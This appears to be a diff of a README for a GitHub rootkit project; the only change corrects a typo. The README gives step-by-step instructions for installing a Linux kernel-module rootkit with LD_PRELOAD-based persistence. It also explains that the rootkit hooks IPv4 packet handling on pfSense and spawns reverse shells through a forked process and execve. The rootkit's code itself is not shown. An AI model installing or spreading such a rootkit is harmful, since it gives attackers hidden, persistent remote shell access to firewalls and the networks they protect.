Mon-keyBoy/house_of_sharad/README.md

 This LKM/Rootkit has persistance, from ldpreload.sh, which is loaded via load_and_setup.sh.

 To load the Rootkit you must clone this directroy, cd into it, chmod +x load_and_setup.sh, and run ./load_and_setup.sh.
-You will be popped out into a ghost /Apekit-tooshit directory do run cd / after the script is done.
+You will be popped out into a ghost /Apekit-tooshit directory so run cd / after the script is done.

 What does it do?
 This Rootkit registers a custom hook to the top of the IPv4 head within pfSense and establishes reverse shells by forking the process that runs cat and running the reverse shell command in that fork with execve.